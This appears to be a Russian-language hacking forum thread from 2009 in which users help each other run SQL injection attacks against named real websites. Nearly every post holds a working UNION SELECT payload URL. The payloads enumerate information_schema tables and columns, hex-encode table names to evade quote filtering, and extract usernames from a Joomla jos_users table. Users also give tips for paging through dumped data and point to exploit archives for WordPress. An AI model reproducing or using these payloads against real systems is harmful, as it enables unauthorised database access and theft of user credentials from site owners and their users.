Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. je0n

    je0n Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    345
    Likes Received:
    96
    Reputations:
    41
    не пойму как вывести через group_concat(),вот как делаю:
    Code:
    http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(table_name%20separator%200?0a),6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
    
    вот уязвимость без group_concat():
    Code:
    http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
    
     
  2. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--
     
    1 person likes this.
  3. je0n

    je0n Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    345
    Likes Received:
    96
    Reputations:
    41
    ага) а как разделить сменить на <br>
    так получается
    Code:
    http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+0x3b),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
    
    а так нет :(
    Code:
    http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+char(60,98,114,62)),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
    
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Так тебе нужно?
    http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group_concat(concat_ws(0x3a,table_name,column_name)+separator+0x3C62723E),6,7,8,9,10,11,12,13,14,15+from+information_schema.columns--
     
    1 person likes this.
  5. je0n

    je0n Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    345
    Likes Received:
    96
    Reputations:
    41
    Да, это! спасибо!

    уммммм,хотелось бы посмотреть как выводить данные по кускам, ибо limit здесь не работает :(
    пробовал substring в запросе - не прокатывает. Почитал о чем эти говорят:
    http://forum.antichat.ru/threadnav46016-495-10.html (и предыдущая страница)
    выводить только на первую букву тоже не катит если очень большая или мальенькая БД :(
    а о чем еще способ, который предложил l1ght я вообще не вдуплю.
    Есть какие предложения?
     
  6. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,column_name+from+information_schema.columns+where+table_name='jos_users'/* не показывает колонки в табле чо делать?
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/*
    
    Скачать кодировщик
     
    #5087 Pashkela, 29 Jan 2009
    Last edited: 29 Jan 2009
  8. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    je0n, а что там не понятного? смотри, например, в таблице users n записей:
    Админ,Бобик,Вовик,Гогик,Додик...
    предположим group_concat(users) выводит три записи
    Админ,Бобик,Вовик
    ставим условие where users>'Вовик' (или 0xВовик) => выводится следущие три записи в алфавитном порядке

    Ghost0ff,
    select hex('jos_users')
    http://k0x.ru/encoder/index.php 1 строчка
     
    #5088 l1ght, 29 Jan 2009
    Last edited: 29 Jan 2009
    2 people like this.
  9. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    хм. Я в случае не отображения ставил md5 тоесть 'jos_users' шифровал и подставлял 0xдалее зашифрованное 'jos_users' в какой шифровке вы это мутите?
     
  10. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Ghost0ff, при чём тут MD5? Если кавычки фильтруются, то это обходится с помощью 0xZZZZZZZZ, где Z-представление каждого байта слова в шестнадцатиричном эквиваленте... То есть для jos_users (без кавычек) это 0x6A6F735F7573657273
     
  11. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    Все, понял. Спасибо за толковое описание ) трабла №2: http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,username+from+jos_users/* не отображает (Хочу за 1 раз забать все вопросы меня интересующие)
    P.S. эти 2 вопроса меня мучали пол жизни
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Определяем БД, где таблица jos_users:

    Code:
    http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,table_schema+from+information_schema.columns+where+table_name=0x6A6F735F7573657273/*
    
    А теперь правильно забираем данные:

    Code:
    http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,username+from+test.jos_users/*
    
     
  13. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    На будущее, когда лазишь по базе, старайся выбирать те таблицы, которые лежат в контексте того юзера, под которым работает бажное приложение:

    http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9999+UNION+SELECT+1,CONCAT_WS(0x3a,table_schema,table_name)+FROM+information_schema.tables+WHERE+table_schema=DATABASE()+LIMIT+0,1--+
     
  14. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    http://www.lider-grup.ru/news.php?newsid=-33+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4/*

    Сбрутил только таблицу новостей.У кого есть хорошие словари,пробегитесь =_=,а то я ф панике.
     
  15. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Господа, интересуют уязвимости WordPress, что кто может посоветовать?
     
  16. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    а чем брутиш?
     
  17. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    http://www.milw0rm.com/ ? Что то ничего там не нашел :(
     
    1 person likes this.
  18. TELO

    TELO Member

    Joined:
    21 Jan 2009
    Messages:
    68
    Likes Received:
    44
    Reputations:
    6
    http://runnercat.org.ua/page.php?id=13172%20order%20by%201%20--
    а что дальше?
     
  19. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://runnercat.org.ua/page.php?id=13172+and+substring(version(),1,1)=5
    
     
  20. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    http://milw0rm.com/search.php wordpress
     
    1 person likes this.
Thread Status:
Not open for further replies.